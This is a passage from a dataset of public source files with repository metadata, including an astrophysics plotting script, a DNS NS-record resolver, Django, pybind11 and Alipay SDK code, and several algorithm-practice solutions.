zsolar = [0.0134, 7.14e-4, 2.38e-3, 6.71e-4, 2.38e-3, 5.79e-3]
deltath = 2.046913
Tth = 5.
delta_fr200 = 0.25
min_fr200 = 0.25
nbins_fr200 = 5
fr200 = np.arange(min_fr200, (nbins_fr200+1)*delta_fr200, delta_fr200)
idelta = 0.8 / (len(fr200) -1)
icolor = np.arange(0.1, 0.9+idelta, idelta)
cmap = cm.get_cmap('viridis')
colors = [cmap(i) for i in icolor]
plot_dir = '/disk04/sapple/cgm/absorption/ml_project/analyse_spectra/plots/'
sample_dir = f'/disk04/sapple/data/samples/'
with h5py.File(f'{sample_dir}{model}_{wind}_{snap}_galaxy_sample.h5', 'r') as sf:
gal_ids = sf['gal_ids'][:]
mass = sf['mass'][:]
ssfr = sf['ssfr'][:]
fig, ax = plt.subplots(3, 1, figsize=(7, 6.5), sharey='row', sharex='col')
ax = ax.flatten()
for l, line in enumerate(lines):
results_file = f'/disk04/sapple/data/normal/results/{model}_{wind}_{snap}_fit_lines_{line}.h5'
weighted_D = np.zeros(len(fr200))
weighted_D_25 = np.zeros(len(fr200))
weighted_D_75 = np.zeros(len(fr200))
weighted_T = np.zeros(len(fr200))
weighted_T_25 = np.zeros(len(fr200))
weighted_T_75 = np.zeros(len(fr200))
weighted_Z = np.zeros(len(fr200))
weighted_Z_25 = np.zeros(len(fr200))
weighted_Z_75 = np.zeros(len(fr200))
for i in range(len(fr200)):
with h5py.File(results_file, 'r') as hf:
all_Z = hf[f'log_Z_{fr200[i]}r200'][:] - np.log10(zsolar[l])
all_T = hf[f'log_T_{fr200[i]}r200'][:]
all_D = hf[f'log_rho_{fr200[i]}r200'][:] - np.log10(cosmic_rho)
all_N = hf[f'log_N_{fr200[i]}r200'][:]
all_chisq = hf[f'chisq_{fr200[i]}r200'][:]
all_ids = hf[f'ids_{fr200[i]}r200'][:]
mask = (all_N > N_min[l]) * (all_chisq < chisq_lim[l])
all_Z = all_Z[mask]
all_T = all_T[mask]
all_D = all_D[mask]
all_ids = all_ids[mask]
all_N = all_N[mask]
order = np.argsort(all_D)
weighted_D[i] = all_D[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.5))]
weighted_D_25[i] = all_D[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.25))]
weighted_D_75[i] = all_D[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.75))]
order = np.argsort(all_T)
weighted_T[i] = all_T[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.5))]
weighted_T_25[i] = all_T[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.25))]
weighted_T_75[i] = all_T[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.75))]
order = np.argsort(all_Z)
weighted_Z[i] = all_Z[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.5))]
weighted_Z_25[i] = all_Z[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.25))]
weighted_Z_75[i] = all_Z[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.75))]
if i == 0:
ax[0].errorbar(line_ev[l], weighted_D[i], color=colors[i], yerr=np.array([[weighted_D[i] - weighted_D_25[i], weighted_D_75[i] - weighted_D[i],]]).T,
lw=1, ls='None', marker='None', capsize=2)
ax[1].errorbar(line_ev[l], weighted_T[i], color=colors[i], yerr=np.array([[weighted_T[i] - weighted_T_25[i], weighted_T_75[i] - weighted_T[i],]]).T,
lw=1, ls='None', marker='None', capsize=2)
ax[2].errorbar(line_ev[l], weighted_Z[i], color=colors[i], yerr=np.array([[weighted_Z[i] - weighted_Z_25[i], weighted_Z_75[i] - weighted_Z[i],]]).T,
lw=1, ls='None', marker='None', capsize=2)
ax[0].scatter(line_ev[l], weighted_D[i], color=colors[i])
ax[1].scatter(line_ev[l], weighted_T[i], color=colors[i])
if l == 0:
ax[2].scatter(line_ev[l], weighted_Z[i], color=colors[i], label=r'$\rho / r_{{200}} = {{{}}}$'.format(fr200[i]))
else:
ax[2].scatter(line_ev[l], weighted_Z[i], color=colors[i])
ax[0].annotate(plot_lines[l], xy=(line_ev[l] - adjust_x[l], np.min(weighted_D - 0.35)), fontsize=13)
ax[0].axhline(deltath, ls=':', c='k', lw=1)
ax[1].axhline(Tth, ls=':', c='k', lw=1)
ax[2].legend(loc=4, fontsize=12)
ax[0].set_ylim(1, 4.)
ax[1].set_ylim(4, 5.7)
ax[2].set_ylim(-1.75, )
ax[2].set_xlabel(r'${\rm log }(E / {\rm eV})$')
ax[0].set_ylabel(r'${\rm log }\delta$')
ax[1].set_ylabel(r'${\rm log } (T / {\rm K})$')
ax[2].set_ylabel(r'${\rm log} (Z / Z_{\odot})$')
ax[0].xaxis.set_minor_locator(AutoMinorLocator(4))
ax[1].xaxis.set_minor_locator(AutoMinorLocator(4))
plt.tight_layout()
fig.subplots_adjust(wspace=0., hspace=0.)
plt.savefig(f'{plot_dir}{model}_{wind}_{snap}_Nweighted_deltaTZ_chisqion.pdf', format='pdf')
plt.clf()
| [
"sarahappleby20@gmail.com"
] | sarahappleby20@gmail.com |
80e40972cefad943c6a440d4cdb5f832a4e262f0 | 152fc8d9722e9811c0f15f26acf7cd1f82849b2a | /Facebook/move_zeros.py | 163329db6cd3f9cbf7a56edfbae5b805e5f38c2e | [] | no_license | uoojin1/algo_study | 5942bc2ea9f2a752b36db296b42e1636a43c1553 | c5078b377105f092668b594b0d7a297c4422b4a1 | refs/heads/master | 2020-04-13T17:38:05.429046 | 2019-02-07T02:32:24 | 2019-02-07T02:32:24 | 163,352,673 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 718 | py | ''' move zeros
input: [0,1,0,3,12]
output: [1,3,12,0,0]
1. do this in place, w/o making a copy of the array
2. minimize the number of operations
'''
'''
[0, 1, 0, 3, 12]
^
so basically have a pointer that points to where I should put the next non zero element to
after iterating through the entire array, I should have all the non zero numbers put to the
left side of the array. and the index should point at the start index of 0s to the right
'''
def moveZeros(nums):
index = 0
for num in nums:
if num != 0:
nums[index] = num
index += 1
for i in range(index, len(nums)):
nums[i] = 0
return nums
print moveZeros([0,1,0,3,12,0,5,2,1,70,0,0,3,0,2,1,5]) | [
"uoojin95@gmail.com"
] | uoojin95@gmail.com |
08c1931fd532b86ad3326a6391b1de86663e1372 | 64f81cfd4e588c1b6ead8481b2e35196c2149413 | /obtaining3.58/obtaining_dns_client/resolving_domain_dns/resolving_domain_ns_by_tld2.py | fa5f9e6680c8e0d71df28c3f6b8e606ab86dbbb7 | [] | no_license | JX-Wang/Valid_DNS_verification | b1d7afb14fef78a30d1c21dffe6cf1ce4c5e2dbf | aecf68ca587022449c80b54ec53b43d9ec8dd8f0 | refs/heads/master | 2020-07-28T19:03:16.759597 | 2019-09-19T08:43:30 | 2019-09-19T08:43:30 | 209,502,842 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,858 | py | #encoding:utf-8
"""
通过向各个层次的权威NS地址查询,获取域名的NS记录。
可以配置为在线和离线查询
目前只支持域名是主域名
"""
import dns
import random
import dns.name
import dns.query
import dns.resolver
def get_authoritative_nameserver(domain, offline=False, tld_server = None, default_dns = None, retry_times=1):
"""
通过向各个权威NS发送查询请求,获取域名的NS记录
:param domain: 要查询的域名,目前只支持注册域名的权威查询
:param offline: 是否离线查询,在线表示顶级域名的权威通过配置好的递归服务器获取;离线表示顶级域名的权威地址由输入确定
:param tld_server: 若为离线查询,则tld_server为指定的顶级域名权威IP地址,务必为IP
:param retry_times: 重试次数
:return: rrset ,域名的NS记录
"""
if offline and not tld_server: # 若使用离线数据,但顶级域名权威为空,则输出错误
return '顶级域名权威地址IP不能为空'
n = dns.name.from_text(domain)
if len(n) == 1:
return "域名的顶级域名不存在"
depth = 2
rrset = None
if default_dns:
nameservers = [default_dns, '114.114.114.114', '223.5.5.5','119.29.29.29','180.76.76.76']
else:
nameservers = ['114.114.114.114', '223.5.5.5','119.29.29.29','180.76.76.76']
nameserver = default_dns # 初始化dns
default = dns.resolver.Resolver(configure=False) # 自定义本地递归服务器
default.timeout = 2
random.shuffle(nameservers)
default.nameservers = nameservers
while True:
s = n.split(depth)
last = s[0].to_unicode() == u'@'
sub = s[1]
if len(sub) == 2: # 若为顶级域名,且为offline,则使用指定的顶级域名权威查询域名的ns
if offline:
nameserver = tld_server
depth += 1
continue
# query = dns.message.make_query(sub, dns.rdatatype.NS, use_edns=True) # 增加使用edns
query = dns.message.make_query(sub, dns.rdatatype.NS)
try:
response = dns.query.udp(query, nameserver, timeout=2)
except:
if retry_times:
retry_times = retry_times - 1
if not rrset:
continue
# 重新选择一个ns地址
rrset_cnt = len(rrset) # rrset的大小
random_serial = random.randint(0, rrset_cnt - 1)
rr = rrset[random_serial] # 随机选择一条记录
try:
authority = rr.target
except Exception,e:
return str(e)
try:
nameserver = default.query(authority).rrset[0].to_text()
except:
try:
nameserver = default.query(authority).rrset[0].to_text()
except:
return "resovling nameserver failed"
continue
else:
return 'TIMEOUT'
retry_times = 1 # 若成功,则重新初始化超时重试次数
rcode = response.rcode()
if rcode != dns.rcode.NOERROR:
if rcode == dns.rcode.NXDOMAIN:
# print '%s does not exist.' % sub
return 'NOEXSIT'
else:
return 'Error %s' % dns.rcode.to_text(rcode)
try: # 新增加异常判断
if len(response.authority) > 0:
rrset = response.authority[0]
else:
rrset = response.answer[0]
except Exception, e:
return str(e)
if last:
return rrset
rrset_cnt = len(rrset) # rrset的大小
random_serial = random.randint(0, rrset_cnt-1) # 根据长度,随机选择一个序号
rr = rrset[random_serial] # 随机选择一条记录
if rr.rdtype == dns.rdatatype.SOA:
# print 'Same server is authoritative for %s' % sub
pass
else:
try:
authority = rr.target
except:
return 'authority soa target error'
# print '%s is authoritative for %s' % (authority, sub)
try:
nameserver = default.query(authority).rrset[0].to_text()
except:
try:
nameserver = default.query(authority).rrset[0].to_text()
except:
return "resovling nameserver failed"
depth += 1
def parse_rc_ns(rrset):
"""解析出域名的NS集合"""
ns = []
respond_main_domain = ""
r = str(rrset.to_text())
for i in r.split('\n'):
i = i.split(' ')
rc_type, rc_ttl = i[3], i[1]
if rc_type == 'NS':
ns.append((i[4][:-1]).lower())
respond_main_domain = i[0][:-1]
ns.sort()
return respond_main_domain, ns
def get_domain_ns_hierarchical_dns(main_domain, offline = False, tld_server=None, default_dns=None):
"""按照DNS的分布层级,获取域名NS记录"""
rrset = get_authoritative_nameserver(main_domain,offline,tld_server,default_dns)
if isinstance(rrset, dns.rrset.RRset):
respond_main_domain, ns = parse_rc_ns(rrset)
if main_domain == respond_main_domain:
return [main_domain, ns], 'TRUE'
else:
return [main_domain, []], 'FALSE'
else:
# print '域名: %s, 异常原因:%s' % (domain, rrset)
return [main_domain, []], rrset
if __name__ == '__main__':
domain = 'badoo.com'
print get_domain_ns_hierarchical_dns(domain, offline=True, tld_server='192.26.92.30') #offline模式
domain = 'baidu.com'
print get_domain_ns_hierarchical_dns(domain) # online模式 | [
"1411349759@qq.com"
] | 1411349759@qq.com |
613442e4334b7b1c405168b18116068806fdff41 | c86cb4e5e036a4a591acb8683c9e7023b657fdfe | /breathecode/admissions/migrations/0006_auto_20200703_1951.py | a4d6b94f4dc09df601bd0054def34615ce51c921 | [] | no_license | Joshfishman97/apiv2 | 0fe6c01cb63fafcbaf772ea2fee4b549694d3abf | aee21638748caf7abbd7543bcde95ef74e0bbb7c | refs/heads/master | 2023-08-29T09:21:51.635903 | 2021-10-11T19:52:40 | 2021-10-11T19:52:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 518 | py | # Generated by Django 3.0.7 on 2020-07-03 19:51
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('admissions', '0005_auto_20200703_1752'),
]
operations = [
migrations.RemoveField(
model_name='cohort',
name='online_room_url',
),
migrations.AlterField(
model_name='cohort',
name='ending_date',
field=models.DateTimeField(blank=True, null=True),
),
]
| [
"aalejo@gmail.com"
] | aalejo@gmail.com |
38429a573b65366bc1e423cace706d35a5c44f7e | b806f99e96dc6782e5983fa1e3e0df5957cee122 | /src/asiopal/TLSConfig.h | 90550300caabce45b51257e55711e58b8b01cfcd | [
"Apache-2.0"
] | permissive | garretfick/pydnp3 | db1b29e7b1416a102abceaa322a3f9da1336fa55 | 54f7e791bf86a5122e8b734e9d8d64882796cadc | refs/heads/master | 2023-04-06T08:33:59.335065 | 2019-11-30T02:08:45 | 2019-11-30T02:08:45 | 174,612,654 | 4 | 1 | Apache-2.0 | 2023-03-27T09:39:27 | 2019-03-08T21:31:10 | Python | UTF-8 | Python | false | false | 4,996 | h | /*
* -*- coding: utf-8 -*- {{{
* vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
*
* Copyright 2018, Kisensum.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
* Neither Kisensum, nor any of its employees, nor any jurisdiction or
* organization that has cooperated in the development of these materials,
* makes any warranty, express or implied, or assumes any legal liability
* or responsibility for the accuracy, completeness, or usefulness or any
* information, apparatus, product, software, or process disclosed, or
* represents that its use would not infringe privately owned rights.
* Reference herein to any specific commercial product, process, or service
* by trade name, trademark, manufacturer, or otherwise does not necessarily
* constitute or imply its endorsement, recommendation, or favoring by Kisensum.
* }}}
*/
#ifndef PYDNP3_ASIOPAL_TLSCONFIG_H
#define PYDNP3_ASIOPAL_TLSCONFIG_H
#include <pybind11/pybind11.h>
#include <Python.h>
#include <asiopal/TLSConfig.h>
#ifdef PYDNP3_ASIOPAL
namespace py = pybind11;
using namespace std;
void bind_TLSConfig(py::module &m)
{
// ----- struct: asiopal:::TLSConfig -----
py::class_<asiopal::TLSConfig>(m, "TLSConfig",
"TLS configuration information.")
.def(
py::init<const std::string&, const std::string&, const std::string&, int, bool, bool, bool, const std::string&>(),
" Construct a TLS configuration. \n"
":param peerCertFilePath: Certificate file used to verify the peer or server. Can be CA file or a "
"self-signed cert provided by other party. \n"
":param localCertFilePath: File that contains the certificate (or certificate chain) that will be "
"presented to the remote side of the connection \n"
":param privateKeyFilePath: File that contains the private key corresponding to the local certificate \n"
":param maxVerifyDepth: The maximum certificate chain verification depth (0 == self-signed only) \n"
":param allowTLSv10: Allow TLS version 1.0 (default false) \n"
":param allowTLSv11: Allow TLS version 1.1 (default false) \n"
":param allowTLSv12: Allow TLS version 1.2 (default true) \n"
":param cipherList: The openssl cipher-list, defaults to empty string which does not modify the default "
"cipher list \n"
"localCertFilePath and privateKeyFilePath can optionally be the same file, i.e. a PEM that contains both "
"pieces of data.",
py::arg("peerCertFilePath"),
py::arg("localCertFilePath"),
py::arg("privateKeyFilePath"),
py::arg("maxVerifyDepth") = 0,
py::arg("allowTLSv10") = false,
py::arg("allowTLSv11") = false,
py::arg("allowTLSv12") = false,
py::arg("cipherList") = ""
)
.def_readwrite(
"peerCertFilePath",
&asiopal::TLSConfig::peerCertFilePath,
"Certificate file used to verify the peer or server. Can be CA file or a self-signed cert provided "
"by other party."
)
.def_readwrite(
"localCertFilePath",
&asiopal::TLSConfig::localCertFilePath,
"File that contains the certificate (or certificate chain) that will be presented to the remote side "
"of the connection."
)
.def_readwrite(
"privateKeyFilePath",
&asiopal::TLSConfig::privateKeyFilePath,
"File that contains the private key corresponding to the local certificate."
)
.def_readwrite(
"maxVerifyDepth",
&asiopal::TLSConfig::maxVerifyDepth,
"Max verification depth (defaults to 0 - peer certificate only)."
)
.def_readwrite(
"allowTLSv10",
&asiopal::TLSConfig::allowTLSv10,
"Allow TLS version 1.0 (default false)."
)
.def_readwrite(
"allowTLSv11",
&asiopal::TLSConfig::allowTLSv11,
"Allow TLS version 1.1 (default false)."
)
.def_readwrite(
"allowTLSv12",
&asiopal::TLSConfig::allowTLSv12,
"Allow TLS version 1.2 (default true)."
)
.def_readwrite(
"cipherList",
&asiopal::TLSConfig::cipherList,
"Openssl format cipher list"
);
}
#endif // PYDNP3_ASIOPAL
#endif
| [
"anhhng141@gmail.com"
] | anhhng141@gmail.com |
7a775527cc467edc8a9e6c6269de9ab5c023c3e2 | 23611933f0faba84fc82a1bc0a85d97cf45aba99 | /google-cloud-sdk/.install/.backup/lib/googlecloudsdk/core/exceptions.py | f84acc69f0dc89dfaf69055e8503fad1847a0204 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | KaranToor/MA450 | 1f112d1caccebdc04702a77d5a6cee867c15f75c | c98b58aeb0994e011df960163541e9379ae7ea06 | refs/heads/master | 2021-06-21T06:17:42.585908 | 2020-12-24T00:36:28 | 2020-12-24T00:36:28 | 79,285,433 | 1 | 1 | Apache-2.0 | 2020-12-24T00:38:09 | 2017-01-18T00:05:44 | Python | UTF-8 | Python | false | false | 3,353 | py | # Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base exceptions for the Cloud SDK."""
import os
from googlecloudsdk.core.util import platforms
class _Error(Exception):
"""A base exception for all Cloud SDK errors.
This exception should not be used directly.
"""
pass
class InternalError(_Error):
"""A base class for all non-recoverable internal errors."""
pass
class Error(_Error):
"""A base exception for all user recoverable errors.
Any exception that extends this class will not be printed with a stack trace
when running from CLI mode. Instead it will be shows with a message of how
the user can correct this problem.
All exceptions of this type must have a message for the user.
"""
def __init__(self, *args, **kwargs):
"""Initialize a core.Error.
Args:
*args: positional args for exceptions.
**kwargs: keyword args for exceptions, and additional arguments:
- exit_code: int, The desired exit code for the CLI.
"""
super(Error, self).__init__(*args)
self.exit_code = kwargs.get('exit_code', 1)
class MultiError(Error):
"""Collection of Error instances as single exception."""
def __init__(self, errors):
super(MultiError, self).__init__(', '.join(str(e) for e in errors))
class RequiresAdminRightsError(Error):
"""An exception for when you don't have permission to modify the SDK.
This tells the user how to run their command with administrator rights so that
they can perform the operation.
"""
def __init__(self, sdk_root):
message = (
u'You cannot perform this action because you do not have permission '
u'to modify the Google Cloud SDK installation directory [{root}].\n\n'
.format(root=sdk_root))
if (platforms.OperatingSystem.Current() ==
platforms.OperatingSystem.WINDOWS):
message += (
'Click the Google Cloud SDK Shell icon and re-run the command in '
'that window, or re-run the command with elevated privileges by '
'right-clicking cmd.exe and selecting "Run as Administrator".')
else:
# Specify the full path because sudo often uses secure_path and won't
# respect the user's $PATH settings.
gcloud_path = os.path.join(sdk_root, 'bin', 'gcloud')
message += (
u'Re-run the command with sudo: sudo {0} ...'.format(gcloud_path))
super(RequiresAdminRightsError, self).__init__(message)
class NetworkIssueError(Error):
"""An error to wrap a general network issue."""
def __init__(self, message):
super(NetworkIssueError, self).__init__(
'{message}\n'
'This may be due to network connectivity issues. Please check your '
'network settings, and the status of the service you are trying to '
'reach.'.format(message=message))
| [
"toork@uw.edu"
] | toork@uw.edu |
132d3a611c7577d20741d725a2e5be24f6cd955a | 5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d | /alipay/aop/api/domain/AnttechBlockchainSignIndexCreateModel.py | b024cf20674b77a37b1eb383bfa79e53e90aa35b | [
"Apache-2.0"
] | permissive | alipay/alipay-sdk-python-all | 8bd20882852ffeb70a6e929038bf88ff1d1eff1c | 1fad300587c9e7e099747305ba9077d4cd7afde9 | refs/heads/master | 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 | Apache-2.0 | 2023-04-25T04:54:02 | 2018-05-14T09:40:54 | Python | UTF-8 | Python | false | false | 6,540 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AnttechBlockchainSignIndexCreateModel(object):
def __init__(self):
self._app_name = None
self._biz_corp = None
self._biz_from = None
self._biz_scene = None
self._biz_unique_key = None
self._open_id = None
self._principal_id = None
self._principal_type = None
self._sign_version = None
self._tenant = None
self._valid_end_date = None
self._valid_start_date = None
@property
def app_name(self):
return self._app_name
@app_name.setter
def app_name(self, value):
self._app_name = value
@property
def biz_corp(self):
return self._biz_corp
@biz_corp.setter
def biz_corp(self, value):
self._biz_corp = value
@property
def biz_from(self):
return self._biz_from
@biz_from.setter
def biz_from(self, value):
self._biz_from = value
@property
def biz_scene(self):
return self._biz_scene
@biz_scene.setter
def biz_scene(self, value):
self._biz_scene = value
@property
def biz_unique_key(self):
return self._biz_unique_key
@biz_unique_key.setter
def biz_unique_key(self, value):
self._biz_unique_key = value
@property
def open_id(self):
return self._open_id
@open_id.setter
def open_id(self, value):
self._open_id = value
@property
def principal_id(self):
return self._principal_id
@principal_id.setter
def principal_id(self, value):
self._principal_id = value
@property
def principal_type(self):
return self._principal_type
@principal_type.setter
def principal_type(self, value):
self._principal_type = value
@property
def sign_version(self):
return self._sign_version
@sign_version.setter
def sign_version(self, value):
self._sign_version = value
@property
def tenant(self):
return self._tenant
@tenant.setter
def tenant(self, value):
self._tenant = value
@property
def valid_end_date(self):
return self._valid_end_date
@valid_end_date.setter
def valid_end_date(self, value):
self._valid_end_date = value
@property
def valid_start_date(self):
return self._valid_start_date
@valid_start_date.setter
def valid_start_date(self, value):
self._valid_start_date = value
def to_alipay_dict(self):
params = dict()
if self.app_name:
if hasattr(self.app_name, 'to_alipay_dict'):
params['app_name'] = self.app_name.to_alipay_dict()
else:
params['app_name'] = self.app_name
if self.biz_corp:
if hasattr(self.biz_corp, 'to_alipay_dict'):
params['biz_corp'] = self.biz_corp.to_alipay_dict()
else:
params['biz_corp'] = self.biz_corp
if self.biz_from:
if hasattr(self.biz_from, 'to_alipay_dict'):
params['biz_from'] = self.biz_from.to_alipay_dict()
else:
params['biz_from'] = self.biz_from
if self.biz_scene:
if hasattr(self.biz_scene, 'to_alipay_dict'):
params['biz_scene'] = self.biz_scene.to_alipay_dict()
else:
params['biz_scene'] = self.biz_scene
if self.biz_unique_key:
if hasattr(self.biz_unique_key, 'to_alipay_dict'):
params['biz_unique_key'] = self.biz_unique_key.to_alipay_dict()
else:
params['biz_unique_key'] = self.biz_unique_key
if self.open_id:
if hasattr(self.open_id, 'to_alipay_dict'):
params['open_id'] = self.open_id.to_alipay_dict()
else:
params['open_id'] = self.open_id
if self.principal_id:
if hasattr(self.principal_id, 'to_alipay_dict'):
params['principal_id'] = self.principal_id.to_alipay_dict()
else:
params['principal_id'] = self.principal_id
if self.principal_type:
if hasattr(self.principal_type, 'to_alipay_dict'):
params['principal_type'] = self.principal_type.to_alipay_dict()
else:
params['principal_type'] = self.principal_type
if self.sign_version:
if hasattr(self.sign_version, 'to_alipay_dict'):
params['sign_version'] = self.sign_version.to_alipay_dict()
else:
params['sign_version'] = self.sign_version
if self.tenant:
if hasattr(self.tenant, 'to_alipay_dict'):
params['tenant'] = self.tenant.to_alipay_dict()
else:
params['tenant'] = self.tenant
if self.valid_end_date:
if hasattr(self.valid_end_date, 'to_alipay_dict'):
params['valid_end_date'] = self.valid_end_date.to_alipay_dict()
else:
params['valid_end_date'] = self.valid_end_date
if self.valid_start_date:
if hasattr(self.valid_start_date, 'to_alipay_dict'):
params['valid_start_date'] = self.valid_start_date.to_alipay_dict()
else:
params['valid_start_date'] = self.valid_start_date
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AnttechBlockchainSignIndexCreateModel()
if 'app_name' in d:
o.app_name = d['app_name']
if 'biz_corp' in d:
o.biz_corp = d['biz_corp']
if 'biz_from' in d:
o.biz_from = d['biz_from']
if 'biz_scene' in d:
o.biz_scene = d['biz_scene']
if 'biz_unique_key' in d:
o.biz_unique_key = d['biz_unique_key']
if 'open_id' in d:
o.open_id = d['open_id']
if 'principal_id' in d:
o.principal_id = d['principal_id']
if 'principal_type' in d:
o.principal_type = d['principal_type']
if 'sign_version' in d:
o.sign_version = d['sign_version']
if 'tenant' in d:
o.tenant = d['tenant']
if 'valid_end_date' in d:
o.valid_end_date = d['valid_end_date']
if 'valid_start_date' in d:
o.valid_start_date = d['valid_start_date']
return o
| [
"jishupei.jsp@alibaba-inc.com"
] | jishupei.jsp@alibaba-inc.com |
9becd149112233943b28b41f338400549756c333 | d3720c1848fb69a05121fcd378a12a6d1921f303 | /4_LEETCODE/2_DP/背包问题/2_完全背包.py | 35b58da0a6cc62245ebacf6c4ba97c14a70f2b33 | [] | no_license | fzingithub/SwordRefers2Offer | 32a44e87c178bafc554108f1d1e479e18b0ee028 | 57f303aa6e76f7c5292fa60bffdfddcb4ff9ddfb | refs/heads/master | 2023-04-08T09:35:02.082121 | 2023-03-28T00:06:00 | 2023-03-28T00:06:00 | 219,700,616 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,412 | py | '''
f[i][j] 前i个物品,体积为j的背包,理论上的最大价值。
f[0][0] = 0
res = max{f[N]}
f[i][j] = max{f[i-1_最短回文串.py][j], f[i-1_最短回文串.py][j-k*v[i]] + k*w[i]}
'''
N, V = map(int, input().split())
v = [0] * (N + 1)
w = [0] * (N + 1)
for i in range(1, N + 1):
v[i], w[i] = map(int, input().split())
# print(N,V)
# print(v,w)
# f = [[0 for i in range(V+1_最短回文串.py)] for i in range(N+1_最短回文串.py)] # 初始化全0
#
# for i in range(1_最短回文串.py, N + 1_最短回文串.py):
# for j in range(V + 1_最短回文串.py):
# f[i][j] = f[i - 1_最短回文串.py][j]
# for k in range(1_最短回文串.py, j // v[i] + 1_最短回文串.py):
# f[i][j] = max(f[i][j], f[i - 1_最短回文串.py][j - k * v[i]] + k * w[i])
#
# print(f[N][V])
# # #优化 二维数组为一维数组
# f = [0 for i in range(V+1_最短回文串.py)] # 初始化全0
#
# for i in range(1_最短回文串.py, N + 1_最短回文串.py):
# for j in range(V, v[i]-1_最短回文串.py, -1_最短回文串.py):
# for k in range(0, j // v[i] + 1_最短回文串.py):
# f[j] = max(f[j], f[j - k * v[i]] + k * w[i])
#
# print(f[V])
#优化 取消k
f = [0 for i in range(V+1)] # 初始化全0
for i in range(1, N + 1):
for j in range(v[i], V+1):
f[j] = max(f[j], f[j-v[i]] + w[i])
print(f[V]) | [
"35060424+fzingithub@users.noreply.github.com"
] | 35060424+fzingithub@users.noreply.github.com |
5e45adf16188acbf28a383b77c22d5cfe2685e61 | 0f0fa5a3086649a32ede3722ca14b598948f35e0 | /setup.py | 551e361538f8b43b270ed51115caee7d37d43ba1 | [] | no_license | marazmiki/django-mptt-admin | cf6b3648e3898233f99e2c2861f8254f61307e1a | 125908b87066e957051f36fed6d60a3088f12cdb | refs/heads/master | 2021-01-22T00:51:21.576551 | 2011-10-11T17:53:54 | 2011-10-11T17:53:54 | 2,557,013 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 889 | py | #!/usr/bin/env python
from setuptools import setup, find_packages
setup(
name = 'mpttadmin',
version = '0.3.1',
author = 'Mikhail Sakhno',
author_email = 'pawn13@gmail.com',
description = """jstree admin for mptt models""",
license = "BSD",
keywords = "django admin",
platforms = "POSIX",
url = 'http://code.tabed.org/mptt_admin',
install_requires=['django'],
packages=['mpttadmin'],#find_packages(),
package_data = { 'mpttadmin': [
'media/js/*.js',
'media/js/lib/*.js',
'media/js/lib/plugins/*.js',
'media/js/lib/themes/*/*',
]},
include_package_data=True,
classifiers=[
"Framework :: Django",
"Intended Audience :: Developers",
"Intended Audience :: System Administrators",
"Operating System :: OS Independent",
"Topic :: Software Development"
],
)
| [
"marazmiki@gmail.com"
] | marazmiki@gmail.com |
d784039fbf29070d60585c62c411d71fd3bbbec9 | 943dca755b940493a8452223cfe5daa2fb4908eb | /abc303/a.py | 252013eff15c913bcc6984509b0f36ea3d48e9cc | [] | no_license | ymsk-sky/atcoder | 5e34556582763b7095a5f3a7bae18cbe5b2696b2 | 36d7841b70b521bee853cdd6d670f8e283d83e8d | refs/heads/master | 2023-08-20T01:34:16.323870 | 2023-08-13T04:49:12 | 2023-08-13T04:49:12 | 254,348,518 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 256 | py | n = int(input())
s = input()
t = input()
for i in range(n):
if s[i] == t[i]:
continue
if (s[i] in "l1") and (t[i] in "l1"):
continue
if (s[i] in "o0") and (t[i] in "o0"):
continue
print("No")
exit()
print("Yes")
| [
"ymsk.sky.95@gmail.com"
] | ymsk.sky.95@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.